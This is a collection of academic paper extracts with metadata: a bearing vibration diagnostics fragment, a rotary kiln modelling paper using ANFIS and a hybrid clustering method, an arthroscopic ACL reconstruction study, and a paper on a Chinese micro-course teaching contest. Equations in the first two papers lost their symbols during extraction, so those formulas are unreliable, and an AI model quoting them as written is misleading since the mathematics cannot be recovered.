At present the most comprehensive review on the possible rolling elements bearing defects is presented in [21,22] which, according to the authors' opinion [21] is not complete and contains only basic faults, the reason that cause these faults and their localization.
The existing methods for analyzing technical condition of rolling elements bearings [2,19,23] in their rare cases, allow adequately detect the faults as the application of direct vibroacoustic signal spectral analysis for detecting the faults of the rolling elements bearings is hampered due to low amplitudes of their frequency components which are lost on the background of a "carpet noise".
Shock pulse modelling
To create more sensitive method for detecting faults and defects a detailed studying of the dynamic processes that take pace in rolling elements bearings and their modelling is necessary.
The initiation of a shock pulse can be described by the following model: where x is a shift; a0 is an initial amplitude; is the damped-vibration frequency, connected with the free-running frequency 2 = 0 2 − 2 ; = 2 ⁄ is vibration damping rate; rresistance value; mvibrating system mass.
Under the natural frequency system the frequency with which the system would vibrate without presence of resisting stress is understood [24]. An integral homogeneous system is studied in this model. In practice this process is more complicated as any machine consists of several parts (stator, rotor, frame, body tec.) which are movable towards each other. The energy from the shock is distributed between the assembly units making them vibrate with different, typical for them natural frequencies. Figure 3a demonstrates the vibratory acceleration pulse shape registered on non-operating testing facility which was influenced by weak periodic stocks of a metal hammer. Even in the original signal (pulse) itself the presence of low and high frequency components is detected. Frequency components during Fourier transformation of vibroacoustic signal (figure 3b) that bring about false frequency components occurrence which are not typical for the original signal are mostly often detected. The analogy with electromagnetic wave can be traced as depending on the length (frequency) they have larger or lesser property of being absorbed (dissipate). On the other hand, it is connected with the mass of an assembly unit that creates the given frequency and with the presence of any energy absorber (for example, shock absorber). The difference in a shock pulse amplitude at the initial moment of time is conditioned by the geometry of a mechanism, i.e. by the distance between the source of the impulse and a specific assembly unit, presence of impediments for dissemination of a vibroacoustic signal. Supposing that the studied system is linear the real pulse we will represent as a sum of pattern pulses with different frequencies and damping rates: To transform the original signal into the Eq. (1) it is optimal to expand it on the bases () In seventies of the twentieth century wavelet methods appeared. Two limits are imposed on a wavelet functionW : it should be isolated enough i.e. go to zero when distancing from the origin of coordinates; the integral of the function at (-; + ) should be equal to zero. Wavelet transformation looks as: where a is a scale; b is a shift; Wavelet transform is a signal of homomorphous and short wavelets, which can be shifted or stretched along the time axis. This is a fundamental difference from infinite wave of Fourier transforms [25,26].
Apart from continuous wavelet transforms there is a discrete transformation where the filtration process takes place. Due to all these, the notions of approximation (high-scale high frequency components) and components (low-scale one) occur. As a result it appears that the original signal is divided into two signals and they complement each other giving two time larger amount of information about the original one. In comparison with the signal decomposition into Fourier-series the wavelets can present local peculiarities of signals with better accuracy and solve the problem of detecting the faults and defects in the equipment by a complex way.
Modal testing
Wavelet function has all essential properties for solving the above-mentioned task. For example, the development of the pulse frequencies in time (figure 5) is built with the help of Haar modified wavelet decomposition. As it was mentioned above the advantage of this method is in its isolation i.e. it gives the chance to trace the dynamics of frequency components amplitudes development.
Conclusion
The introduced approach for rating the mechanical vibration parameters can be used in practice while developing the industrial standards for norming the output product vibration for the purpose of enclosing it into the datasheet. The development of the large number of spectral masks for the wide-range of mining machinery is one of the conditions for quality product manufacturing by mining machinery factories and it assists in shifting towards new forms of technical maintenance of mining machinery.
Applying the forecasting model based on statistic data of the vibration-based diagnostics give a chance adequately evaluate the researched fault and forecast the residual life of an assembly unit or machinery making maintenance planning more effective and preventing the occurrence of emergency failures.
In general the introduced solution will allow minimizing expenses connected with sudden failures of rolling element bearings, optimizing supply logistics and storage facility. All the conditions will be created for shifting to a brand new system of mining machinery repairing and technical maintenance. | 2020-04-30T09:07:18.388Z | 2020-04-28T00:00:00.000 | {
"year": 2020,
"sha1": "b7ef67159b9b877a3e787f87ad02f31c70b8f095",
"oa_license": null,
"oa_url": "https://doi.org/10.1088/1757-899x/795/1/012018",
"oa_status": "GOLD",
"pdf_src": "IOP",
"pdf_hash": "b74f5e1c8b125c11aaffcc073df57c31be6603b5",
"s2fieldsofstudy": [
"Materials Science"
],
"extfieldsofstudy": [
"Physics",
"Engineering"
]
} |
55851649 | pes2o/s2orc | v3-fos-license | Modeling for the Calcination Process of Industry Rotary Kiln Using ANFIS Coupled with a Novel Hybrid Clustering Algorithm
Rotary kiln is important equipment in heavy industries and its calcination process is the key impact to the product quality. Due to the difficulty in obtaining the accurate algebraic model of the calcination process, an intelligent modeling method based on ANFIS and clustering algorithms is studied. In the model, ANFIS is employed as the core structure, and aiming to improve both its performance in reduced computation and accuracy, a novel hybrid clustering algorithm is proposed by combining FCM and Subtractive methods. A quasi-random data set is then hired to test the new hybrid clustering algorithm and results indicate its superiority to FCM and Subtractive methods. Further, a set of data from the successful control activity of sophisticated workers in manufacturing field is used to train the model, and the model demonstrates its advantages in both fast convergence and more accuracy approaching.
Introduction
Calcination process is omnipresent in heavy industries worldwide, such as chemical industry, steel manufactory, and metallurgical industry.This process is significantly important for the final product quality because the calcination is where the product changed its form physically or chemically under certain temperature for a certain span of time.Featuring nonlinearity, long time delay, multivariables and their serious coupling, and a lot of control theories and modeling methodologies for rotary kiln have been studied in the past few decades [1][2][3].
Some researchers built up the algebraic models of rotary kiln by analyzing the gas flow, granular material flow, and heat transfer.The approaches they used were mainly based upon aerodynamics and mechanical structure [4][5][6][7].However, for a specific production kiln, it is usually difficult to obtain the necessary parameters for the adequately accurate model, which is a bottleneck for them to be generalized in wider applications.
In the past decade, many researches have been carried out on the rotary kiln control based on intelligent and prediction techniques.For instance, expert system was proposed to control the kiln which improved the production outcome [7,8].Soft modeling methods based on neural network, support vector machines, and subspace method were used to predict the output index, the calcination temperature, and tail temperature of the kiln, respectively [9][10][11].However, there are still many problems among those studies such as bulky computation and excessive restrictions, and also researches on the modeling for the calcination process of the kiln, which is the core factor for the product quality, are rarely reported.
ANFIS (Adaptive Network-based Fuzzy Inference System) as a model identification method has drawn much attention in different application fields recently [12][13][14].Compared with conventional techniques, it has the advantages of mapping all the inputs to the corresponding outputs based only on the available data and incorporating linguistic knowledge for problem solving and strong generalization capability.In order to improve the computation efficiency and identifying ability of ANFIS, clustering algorithm is utilized to partition the data into clusters and generate appropriate number of fuzzy rules.Among many clusters, fuzzy C-means Clustering Method (FCM) [15] and Subtractive Clustering Method (Subclust) [16] are widely adopted.But each of them has its drawback.Subclust only yields the approximations for the actual cluster centers, whereas for FCM, the number of clusters has to be decided empirically and the algorithm is sensitive to randomly initiated membership grade.It means there is no enough guarantee to find the actual centers for the clusters by applying each of the two clustering methods.Overcoming these problems is significant because tiny deviation of the clustering centers leads to apparent difference in the identified model when the training data have high dimension and they are not so explicitly distinguished.
In this paper, ANFIS is employed as the core structure for the calcination control model with the input and output variables selected by analyzing the calcination reaction and the experience of sophisticated workers.As a premise procedure to modeling, a hybrid clustering algorithm combing FCM and Subclust is put forwards which gets over the weaknesses of FCM and Subclust and leads to more accuracy of the cluster centers.
The rest of this paper starts with an introduction to the industrial rotary kiln and its calcination process in Section 2. In Section 3, FCM and Subclust methods are introduced and then a novel hybrid clustering way of combining these two clustering algorithms is proposed and illustrated in detail.Section 4 presents ANFIS concisely which is adopted as a core modeling structure for the calcination process of the kiln in the next section.In Section 5, modeling is conducted with the method of ANFIS coupled with the new hybrid clustering algorithm, and the implementation results are discussed.
The Rotary Kiln and Calcination Process
The rotary kiln to be studied in this paper is composed of two cylinders, calciner, and drying part, which are connected by an inspection tower.It is actually gigantic equipment with length of 37 meters and a diameter of 2.5 meters, as seen in Figure 1.The kiln is installed with a slope of around 5 ∘ and it rotates around its axis.The drying part has similar length as the calciner, acting as a preheater for the inner material [17].
The material going through the kiln is lithopone, an inorganic compound, used as a white pigment.It is first fed into the elevated cold end, the right side of the drying part, and as the kiln rotates it moves along the declining inner bed due to gravity, towards the exit which is at the left side of calciner.During the long inner rolling, the material is first preheated in drying part, where the temperature is 150 ∘ C∼ 200 ∘ C, and then goes into the calciner which includes an inner pot, as shown in Figure 2. The temperature around the pot is relatively higher, ranging between 600 ∘ C and 800 ∘ C under which the lithopone changes its decoloration capability (DC).
At the hot end (head) of the kiln, the left side of the calciner, diesel or petrol is sprayed and burned to generate the heat for the whole calcining and drying process.A thermal sensor is arranged there and the head temperature is normally maintained at about 1200 ∘ C to assure the heat is enough and stable.As a blower and an exhauster are working at the hot end and cold end, respectively, the air flows from the hot end to cold end, facing up to the material fluid, conveying the heat through the kiln, and at the same time taking away the water steam from the material.
Since there is no effective way to detect the output index (DC) directly which has to be measured offline and normally comes out 2 hours later after the lithopone comes out of the exit, the control largely depends on the experienced worker who empirically adjusts the calcination rotary speed according to the calcination temperature.In general, the worker increases the rotary speed if the temperature is high, and vice versa, to ensure the material inside is heated properly.
Data Clustering Algorithm
Data clustering is the prerequisite for training the ANFIS model and it decides the number of fuzzy rules in the model.There have been different clustering techniques proposed in other literatures [15][16][17][18], among which FCM and Subclust are highly regarded and widely adopted.
In FCM, however, the group number has to be given as a premise and iterative process is time consuming.Randomly initialized belongingness matrix leads to uncertainty of the result as well.Also, as for Subclust, since taking data points as candidates, it does not always perform well for finding the optimal centers when the actual centers are not among the data points.For these drawbacks, the author is inspired to find a new clustering technique, aiming at improving not only the accuracy of the result but also the reduced bulk of calculation.
FCM Algorithm.
Consider a set of data points { 1 , 2 , . . ., } in a -dimensional space, that is, ( = 1, . . ., ) is a vector of coordinates.Given the cluster number , FCM starts by initializing a membership grade × matrix in random according to (1), indicating the belongingness of each data point to the initial centers.
where (1 ≤ ≤ , 1 ≤ ≤ ) is the degree of membership of th data point to th cluster center.
Then new centers are attained and is upgraded by the following equations, respectively: where * is the th cluster center and ∈ [1,∞) is a weighting exponent.
where ‖ ⋅ ‖ is the Euclidean distance.This procedure is carried out repeatedly until the cost function is below a certain tolerance value or no more improvement between the consecutive iterations is noticed. is defined by and is cost function for each cluster center, = 1, . . ., .
Subclust Algorithm.
For the same collection of data points, Subclust begins with calculating the density value for each point by the following formula: where 1 is the density value of th data point at the 1st round of calculation, and is a positive constant representing a neighborhood radius.After all the data points are computed, then the point with the highest density value is chosen as the first cluster center * 1 and its density value is referred to as * 1 .Afterwards the calculation goes into the 2nd round and each point's density value is revised by where 2 is the density value of th data point at the 2nd round of calculation and is also a positive constant defining a neighborhood which has measurable reduction in density value.Then the second point with the highest value is attained and if it satisfies some kind of criteria, then it is selected as the 2nd cluster center.This process repeats until the highest density value is less than a certain threshold.In general, at the th round of calculation, the equation for computing the density value is , ∀ = 1, . . ., . (7)
A New Hybrid Clustering Algorithm Combining FCM and Subclust.
A feasible hybrid way is to use the Subclust to obtain the implicit number of clusters and then employ FCM to find their exact centers [19].But the improvement is rather limited and needs to be further developed.This paper proposes a new way of their combinations which greatly enhance both the computation efficiency and accuracy and it is illustrated in this section.
Considering the above set of data points, first Subclust is adopted to attain group centers { * 1 , . . ., * }, and then we use Gaussian function to define a distance grade × matrix as follows: where represents the relationship between the distance of th data point and th cluster center, and is the standard deviation.According to (8), the data point close to a cluster center has a bigger distance grade value. is a key parameter that largely affects the distance grade value.A recommended choice is letting = (0.1∼1)× .Further ahead, we normalize each column of to be the initial membership grade matrix 0 : , = 1, . . ., ; = 1, . . ., , and 0 is initial belongingness of th data point to th cluster center.
The next part of the hybrid clustering algorithm is initializing FCM with 0 .Since 0 reflects the actual distance between each point and cluster center, that is, the initial centers are already close to the actual centers, therefore the bulk of computation time in FCM definitely decreases substantially.The holistic procedure of the new clustering algorithm uses the following steps.
Step 2. Find the first cluster center * 1 and * 1 with (5) being used in the computational process.
Step 3. Revise each point's density value with (6) and find other cluster centers by using the following criteria, supposing ( − 1)th ( ≥ 2) cluster center has been obtained: ( and min represents the shortest distance between * and all the previous centers, otherwise reject it and choose the point with the next highest density value and retest according to the above three criteria. Step 4. Based on the cluster centers { * 1 , . . ., * } found from the previous steps, calculate the distance grade matrix with (8) and then the initial membership grade matrix 0 with (9).
Step 7. Calculate the cost function according to (4).End the clustering process if is below a certain tolerance value or the improvement over the previous iteration is less than a certain threshold.
Adaptive Network-Based Inference System (ANFIS)
ANFIS is produced by Jang [20] and is based on a multilayer feedforward network structure.It has 5 layers with two kinds of nodes: square ones with parameters to be identified and circle ones with none.The directional links between nodes indicate the flow direction of signals.
Consider the system has inputs { 1 , 2 , . . ., } and one output and suppose each input has two fuzzy sets, as seen in Figure 3.The nodes of the same layers have the same function, as described below.
The 1st layer is composed of square nodes with the node function ( ) ( = 1, . . ., ; = 1, 2), where is the input to node and is a linguistic label representing a fuzzy set. ( ) is usually chosen among bell-shaped functions and its parameters are referred to as premise parameters.
Every node in the 2nd layer is a circle node with the label ∏ which multiplies all the incoming signals from the previous layer and sends the product out: and is the input set of th node from 1st layer. represents the firing strength for th rule.
The third layer has the same number of circle nodes as the second layer.Each node labeled calculates the ratio of its input firing strength to the sum of firing strengths in the previous layer: Each node of 4th layer is a square node generating each rule's output: and , ( = 1, . . ., ; = 1, . . ., ) are the set of parameters in this layer and are referred to as consequent parameters.
In the fifth layer, there is only one circle node with the label ∑ simply adding all the incoming signals together and producing the overall output : The parameters of the network are identified by another hybrid learning procedure, forwards and backwards pass, and the least squares estimate (LSE) formulas and gradient descent method are employed, respectively, in each pass.More details can be found in [20] and applications of ANFIS can be found in [21,22].
Implementation and Results
Having introduced the hybrid clustering algorithm and ANFIS and their mathematical foundations, this section turns back to study the modeling for the calcination process of industrial kiln.First a benchmark group of data is cited to test the three clustering techniques presented in Section 3, and the implementation for modeling is studied afterwards.
Comparison among Different Clustering Algorithms.
A quasi-random two-dimensional data set is used as a benchmark problem to test the performance of the three clustering algorithms.The quasi-random data set is cited from Matlab Toolbox and it includes 140 two-dimension chaotic data points.Assuming there are 3 cluster centers to be found, the three algorithms are implemented individually and their performances are tested.Table 1 lists the value of related parameters in the implementation of the three algorithms.Figure 4 shows the cluster centers attained by the three methods and it is noticed that the results of FCM and hybrid algorithm are more close to the actual centers.Actually, the root mean square error (RMSE) of Subclust turns out to be 14.7956 which is the highest one.Figure 5 shows the change of cost function over time of FCM and hybrid algorithm and it is evident that the convergence speed of hybrid algorithm prevails over FCM greatly.Table 2 compares the iteration number and RMSE between FCM and hybrid algorithm which also indicates the superior performance of the hybrid algorithm to FCM.
Calcination Process Modeling.
The first question to be solved is the determination of the input and output variables for the control model.The method undertaken in this paper is to rely on the experience of the sophisticated workers and the analysis on the calcination mechanism inside the kiln.In practice, the worker regulates the calcination rotary speed (Hz) according to the calcination temperature T ( ∘ C), as seen in Figure 1, which provides important information that can be the only output and should be one of the input variables.
A further study at the inside calcination process manifests that the material changes its property to meet the quality requirement, that is, DC, mainly when it is going through the inner pot because the temperature there is much higher than other parts inside the kiln.This process normally takes 15 to 20 minutes depending on the rotary speed .Consequently, the calcination temperature and rotary speed in the previous time phase should also be considered into the input variables of the model, which matches the time-delay property of the calcination process.After testing different combinations of and in their previous time phases, a set of inputs is chosen as below: During the process, the cost function on clustering phase and checking data error for ANFIS are checked, respectively, as seen in Figures 7 and 8.It can be seen that both the cost function and checking data error in the method of ANFIS with the new hybrid algorithm are smaller at each epoch and converge more quickly.Detailed performance for these two methods is listed in Table 3.
Conclusion
A novel hybrid clustering algorithm combining FCM with Subtractive Clustering Method is proposed and is proved to be more efficient with reduced computation and it leads to more accuracy for the clustering result.ANFIS is employed to establish the control model for the calcination process of industrial rotary kiln with a satisfactory outcome and it sets a role model for similar control situations in industrial field.Coupled with the new hybrid clustering algorithm, the performance of ANFIS improves greatly with reduced computation on clustering phase and approaches more accuracy to the original outputs.Furthermore, study can be focused on the issue of determining the number of time phases and the time interval in the input vector , since it is mainly decided empirically currently.Also, the effect from the drying part of the rotary kiln on modeling is neglected in this paper; the roles of drying temperature and drying rotary speed on the model are to be into consideration as well.
Figure 1 :
Figure 1: Schematic diagram of the rotary kiln.
Figure 2 :
Figure 2: Schematic diagram of the inner pot.
Figure 4 :
Figure 4: Cluster centers from different algorithms on the quasi-random data.(a) The quasi-random data.(b) Cluster centers from Subclust.(c) Cluster centers from FCM.(d) Cluster centers from hybrid algorithm.
Figure 5 :
Figure 5: Plots of cost function of FCM and hybrid algorithm.
Figure 6 :
Figure 6: Plots of the model's output.(a) Output on training data.(b) Output on checking data.
Figure 7 :
Figure 7: Plots of cost function on clustering phase.
Figure 8 :
Figure 8: Error plots on checking data for ANFIS.
Table 2 :
Clustering performance of FCM and hybrid algorithm.
Table 3 :
Performance comparison between ANFIS with FCM and ANFIS with the new hybrid method. | 2018-12-10T08:46:17.954Z | 2017-01-01T00:00:00.000 | {
"year": 2017,
"sha1": "4567bd19fefb75012153477d1ed3731cf6dfeb56",
"oa_license": "CCBY",
"oa_url": "http://downloads.hindawi.com/journals/mpe/2017/1067351.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "4567bd19fefb75012153477d1ed3731cf6dfeb56",
"s2fieldsofstudy": [
"Engineering",
"Computer Science"
],
"extfieldsofstudy": [
"Mathematics"
]
} |
244290895 | pes2o/s2orc | v3-fos-license | Surgical management of arthroscopic anterior cruciate ligament reconstruction using quadruple hamstring graft and assessment of its fuctional outcome
The knee joint is one of the most commonly injured joint in our body and the most commonly injured ligament is ACL. Due to ever increasing RTA’s and increased participation in sporting activities. There is increase in incidence of ligament injuries of knee. The ACL along with other ligaments, capsule is the primary stabilizer of knee and prevent anterior translation and restricts valgus and rotational stress to certain degree. Open reconstruction of ACL which was done earlier is not practiced now a day due to complications such as increased Post-operative pain, stiffness and lengthy rehabilitation phase. Arthroscopic reconstruction of the injured ACL has become the gold standard procedure. The ideal graft for ACL is still a topic of debate. The most commonly used graft are bone patellar tendon bone graft and hamstring graft. The hamstring graft is increasingly used now a day for the following reasons: ▪ Advanced soft tissue fixation technique ▪ Increased incidence of anterior knee pain with bone patellar tendon bone graft This study has been done to evaluate the functional outcome of arthroscopic single bundle anterior cruciate ligament reconstruction using quadrupled hamstring tendon (Gracilis and semitendinosus) autograft in anterior cruciate injuries. Methods: Twenty cases of arthroscopic anterior cruciate ligament reconstruction were regularly followed for an average period of 17.6 months in mamta medical college, Khammam from august 2019 to march 2021. Results: Among twenty patients treated with arthroscopic anterior cruciate ligament reconstruction 45% (9 patients) had excellent functional outcome while 40% (8 patients) had good functional outcome and remaining 15% (3 patients) had fair outcome according to LYSHOLM KNEE SCORE. One patient had superficial infection at the donor site which settled with intravenous antibiotics. One patient developed deep infection of the donor site with wound gaping which is managed with wound debridement and secondary closure and was given intravenous antibiotics which is healed well and the sutures removed after 10 days. One patient developed fixed flexion deformity of 10 degree with range of movements ranging from 10 to 90 degree. The patient had poor compliance to rehabilitation protocol. The mean preoperative IKDC (international knee documentation 2000 score) score was 50.86 while the mean postoperative score was 87.66. there was significant improvement in post-operative IKDC score compared with pre-operative score with P value<0.05. Conclusion: Arthroscopic anterior cruciate ligament reconstruction with hamstring graft is an excellent treatment option for anterior cruciate ligament deficient knees. And Hamstring graft fixation with endobutton and interference screw gives good functional outcome. Good functional results are achieved by careful preoperative planning and respecting the principles of arthroscopic anterior cruciate ligament reconstruction technique.
Introduction
Objectives ▪ To evaluate the functional outcome of arthroscopic single bundle anterior cruciate ligament reconstruction using quadrupled hamstring tendon (gracilis and semitendinosus) autograft in complete anterior cruciate ligament tears.
▪ To study the complications associated with arthroscopic anterior cruciate ligament reconstruction for complete anterior cruciate ligament tear.
Material and Methodology
This is a prospective study of functional outcome and complications following arthroscopic anterior cruciate ligament reconstruction conducted in mamta medical college and general hospital Khammam from august 2019 to march 2021. There were twenty patients included in this study operated for arthroscopic reconstruction of anterior cruciate ligament tears with hamstring graft. The patients were followed up for an average duration of 17.6 months with minimum follow up of 7 months and maximum follow up of 20 months. All young and middle-aged patients presenting with unilateral knee complaints and history of trauma to knee in orthopaedic emergency and outpatient department in mamta medical college and general hospital Khammam were evaluated through general and local examination of unaffected knee to establish ligament excursion and after which the affected knee was examined with following specific tests for diagnosing anterior cruciate ligament deficiency Routine radiographs of both knee in standing position in AP and LATERAL views. MRI of the knee was done in all anterior cruciate ligament torn cases for confirmation. Patients with clinical and MRI evidence of symptomatic individuals with anterior cruciate ligament insufficiency, Patients associated with medial and lateral meninscal tear and grade 1 and 2 medial collateral and lateral collateral ligament injuries with no history of previous surgery in the knee and normal contralateral knee were included in our study. Asymptomatic individuals with systemic diseases compromising their anaesthetic fitness and with associated Posterior cruciate ligament tears grade 3 medial collateral ligament and lateral collateral ligament injuries and patients with osteoarthritic knee and associated tibial plateau fracture and local skin infections were excluded in our study.
Observation and Results: Twenty cases of arthroscopic ACL reconstruction were regularly followed for an average period of 17.6 months in Mamta Medical College and General Hospital Khammam was studied from August 2019 to March 2021. Following factors were observed and tabulated as follows:
Discussion
Due to the increased occurrence of road traffic Accidents and increased number of persons participating in sports activities, the number of ACL reconstructions being done has been increased. Arthroscopic reconstruction of the injured ACL has become the gold standard and is one of the most common procedures done in orthopedics and thus it has been extensively studied and outcomes of ACL reconstruction have gained considerable attention. The choice of graft is a topic of great debate in recent years. The various options include bone patellar tendon bone graft, hamstring graft auto graft, quadriceps tendon, various synthetic grafts and allograft. Among these, the most commonly used are the Bone patellar tendon bone graft and hamstring graft. The advantages of bone patellar tendon bone graft include high ultimate tensile load9approximately 2300 N) and a rigid fixation due to its bony ends. But the hamstring graft has been increasingly used in recent. The advantages of arthroscopic ACL reconstruction using hamstring graft includes decreased surgical site morbidity, decreased occurrence of patellofemoral adhesions and reduced incidence of anterior knee pain. Though the semitendinosus tendon has only 75% and gracilis 49% of the strength of native ACL, the quadrupled semitendinosus or semitendinosus -gracilis have a tensile load of around 4108 N.
Our study is to evaluate the functional outcome of arthroscopic anatomical single bundle ACL reconstruction using quadrupled hamstring autograft. The prospective study was conducted in mamta medical college and general hospital, Khammam to clinically evaluate the clinical results of arthroscopic single bundle ACL reconstruction. This study group comprised of 21 patients with one patient lost to follow up. In our study, the most common mode of injury was Road Traffic Accident followed by sports injuries. One of the patients had an injury due to kick by a bull. Among the sports injuries, Kabbadi was the most common cause of ACL tear. Male predominance was found in our study. 17(85%) patients were males and 3(15%) were females. Of the patients were in the age groups of 20-25 years (35%) 40% of the patients underwent ACL reconstructions 4 to 6 months after injury. The right knee was involved in 11(55%) of patients and left knee in 9(45%) patients. There was not much difference in lateralization of injury. In our study, there was associated meninscal injury in 75% of patients. Five patients in our study had isolated ACL injury. Eleven patients had injury to the medial meniscus where as one patient had injury to the lateral meniscus alone. Three patients had injury to both the medial and lateral meniscus.
The most commonly injured was medial meniscus which was in accordance with other studies. Among the patients with meniscal injuries, three patients were treated by partial meniscectomy and in one patient meniscal repair was done. The rest of the patients were treated conservatively. The functional outcome of patients with isolated ACL injury was comparable with that of the patients with associated meniscal injuries. The most common symptoms at presentation was knee pain (40%) of patients. The other presenting symptoms were instability (30%), locking (15%) and 15% patients presented with both pain and instability. Average duration of follow up of the present study was 17 months with a minimum follow up period of 7 months and maximum follow up period was 27 months. The Average Lysholm score at the end of the study is 91.9. From the above studies, it can be seen that the functional outcome after ACL reconstruction with hamstring graft and bone patellar tendon bone graft are comparable. The mean pre-operative IKDC score in this study was 50.86 whereas the post-operative score was 87.66. There was significant improvement in post-operative IKDC score when compared with pre-operative Score. There was no significant patellofemoral pain noticed in the patients in our study. In our study, anterior tibial translation was eliminated in 85% of patients who were examined at a mean of 17 months post operatively. The remaining 15% of patient (three) had a 1+ Lachman test at the follow up examination. However the laxity did not correlate with the functional score.
In our study, one patient had a deep infection and one patient had superficial infection. The patient with deep infection was managed with wound debridement and intravenous antibiotics while the patient with superficial infection was managed with antibiotics alone. While one patient developed fixed flexion deformity of 10 degrees with range of movements ranging from 10 to 90 degrees. The patient had poor compliance to the rehabilitation protocol.
Conclusions
the summary of this prospective study is as follows: ▪ In young active adults, anatomical single bundle reconstruction with quadrupled hamstring graft gives good functional results. ▪ The absence of patellofemoral pain with the use of hamstring graft makes it a more desirable option for patients with patellofemoral cartilage disorders or those with chronic patellofemoral pain. ▪ Hamstring graft fixation with endobutton and interference screw gives good functional outcome. ▪ Arthroscopic anterior cruciate ligament reconstruction with hamstring graft is an excellent treatment option for anterior cruciate ligament deficient knees. | 2021-11-18T16:30:23.581Z | 2021-07-01T00:00:00.000 | {
"year": 2021,
"sha1": "33afccbffb9c5e9478754a6806bb6b3b8d15c6ea",
"oa_license": null,
"oa_url": "https://www.orthopaper.com/archives/2021/vol7issue3/PartK/7-3-120-390.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "85b60ef3513dcb55ad5be15ae5c94979e0cb2d73",
"s2fieldsofstudy": [
"Medicine",
"Engineering"
],
"extfieldsofstudy": []
} |
219408880 | pes2o/s2orc | v3-fos-license | Micro-course Contest of Foreign Languages in China: Problems and Solutions
The present paper is a detailed analysis of the problems and solutions in Microcourse Contest of Foreign Languages in China. The contestants’ problems as well as those of the judges are summarized and critically evaluated, and corresponding solutions to both types of problems are provided.
Introduction
Micro-course Contest of Foreign Languages in China (MCFLC for convenience's sake) is held annually and the year 2020 will witness its sixth session. MCFLC has grown and matured over the past five years. While numerous teachers benefit a lot from the process of preparing for their microclasses, there still exist some problems concerning MCFLC. By pointing out the relevant problems, contestants, together with judges, can seek ways to improve MCFLC to ensure students' effective learning and fairness of the contest.
Contestants' Problems and Solutions
The key word "micro" suggests that one of the prominent features of a micro-class is its shortness. As a rule, "the time duration for a micro-class should be no more than 10 minutes" [1]. The required duration for a typical micro-class is 5 to 8 minutes, usually no more than 8 minutes. But several contestants' video clips last as long as 10 minutes and even longer, obviously breaking the contest rules. Students are likely to be running out of patience for a lengthy micro-class. Therefore, teachers should first attach uttermost importance to the duration of time for a micro-class. As long as a micro-class can expose the essence and concentration of a teaching point, the shorter the time length, the better learning effect a micro-class will provide for students.
Despite the accuracy in pronunciation and intonation and fluency, some contestants fail to make a qualified micro-class because it lacks a focus. A micro-class will never be a super one if it intends to contain too many points of view. For instance, a teacher in her micro-class lectures her students on a text passage, explaining vocabulary, structure, difficult sentences etc. just like a traditional class. As is known to all, the main function of a micro-class is to solve a specific problem that students may encounter in their studies. From this perspective, the teacher's micro-class is more like a MOOC than a micro-class. So the solution to the lack-of-focus problem is to elaborate on a point and make a micro-class specific-problem-based.
Another problem that is prevalent among contestants is that many of them tend to give facts to students, lacking the very creativity and originality. For example, some teachers may talk about the magic number seven or natural disasters. Their micro-classes are nothing but piles upon piles of facts. There is no point listing all the facts in another language in a micro-class, as students can always be better informed and educated through many other channels than a micro-class in this information age. Teachers should at least summarize the facts to be presented in their micro-classes. To do a better job, teachers are supposed to be able to voice their own opinions on a particular issue.
To some extent, teachers should not only impart knowledge or transmit information to students, but also enlighten them in one way or another to cultivate their comprehensive thinking abilities.
"According to the data analysis of the contestants' works from the first session of MCFLC, of all types of contents, culture and listening and speaking contents account for as high as 46%" [2]. A lot of contestants choose topics such as Chinese or Western culture, public speaking, writing etc. They opt for such topics possibly not because they are helpful to students' learning, but because these topics tend to give their creators more room for making high-quality micro-classes. Actually these topics are all content-based rather than language-based. Quite often, the contents of such minilectures are nothing but some common senses. Students benefit little from such micro-classes because they can easily understand everything in their native tongue. If students can easily understand everything in a foreign language, it only indicates that these students are terrific English speakers. In a sense, it is insignificant to offer such simple content to students with high English proficiency, because for them such simple ideas are just not worth learning. Many students have trouble understanding such mini-lectures not due to its simple "content", but relative complex "language". When it comes to learning a foreign language, what students desire is not information, knowledge, common senses or thought, but the opportunities to practice learning. It is just too ridiculous for a teacher through his or her micro-class to teach students how to give a speech. Students can learn how to deliver an impressive speech all by themselves without the slightest hint of difficulty as they are common senses. Even though students have mastered how to give a super speech after the teacher's mini-lecture, most of them may still be unqualified public speakers because they can never learn linguistically from the teacher's micro-class as language in the microclass is not the focus. It is equally ridiculous for an English teacher to teach students Chinese culture such as acupuncture, a subject with so many specialized terms. Sometimes even the teacher him or herself has difficulty pronouncing all the terms accurately and fluently. How can the teacher expect his or her students to talk about acupuncture with a foreigner with accuracy and fluency just through a 7-minute mini-lecture? The students have to practice themselves to be able to talk about the subject freely. In addition, students have easy access to the learning materials online or in the library, which may present better learning both visually and aurally than the teacher's micro-class.
Some contestants produce very fantastic works, but their sole purpose is to win prizes for their own interests. They carefully design and make their works once a year for the contest, not for the students. They may even appeal to their students, colleagues and family members to vote for their works. However, in reality, they seldom have the habit of making micro-classes on a regular basis and showing them to their students before class. Under this circumstance, micro-class making is by no means a regular activity for teachers. Instead, it has become a self-sufficient thing that has nothing to do with students' learning in the actual learning and teaching practice.
Judges' Problems and Solutions
A qualified judge needs to be a language specialist who has the right aesthetic tendencies. What is more important is that the judge must be patient and do a lot of research before he or she grades his or her candidates. Obviously and unfortunately, some judges are just not that qualified. And their disqualification leads to the unfairness of the play. In reality, misjudgments mostly occur in the province-level contests.
Some contestants' works resemble those in previous sessions, but are still given a high score. Obviously, the experts involved have not done enough research and consequently made terrible mistakes. A teacher enters the final stage by using a machine to dub her micro-class, but the experts have not discovered the truth. One expert even compliments on it, claiming that the pronunciation is clear and beautiful without realizing the artificial nature of the "human" voice. Still in the fifth session held in 2019, there are many mistakes both grammatically and technically in a teacher's work, but it manages to reach the final stage and win a prize. The undiscovered mistakes made by the contestants show either the judges' casual attitudes or their disqualification.
So what are the solutions to these above problems created by unqualified judges? My suggestions are as follows. First, currently there are only about three judges for each contestant's work. More professional judges (at least seven or nine) are needed, and the highest and the lowest marks should be both abandoned. Second, professors should not necessarily be chosen as judges. Instead, judges should be chosen based on their own true merits. They should have the micro-classmaking experiences and be recognized for their English proficiency. Dumb judges for an English contest are never needed. Judges must have the ability to speak in English face to face with the contestants. Third, cross-provincial mutual evaluation is truly indispensible. A contestant's work from one province should be graded by judges from another two provinces. Fourth, judging procedures should be published in detail to all contestants. The major procedures may include: Who are the judges? How many judges are involved? What are the judging criteria? And how are the judges to judge?
Conclusion
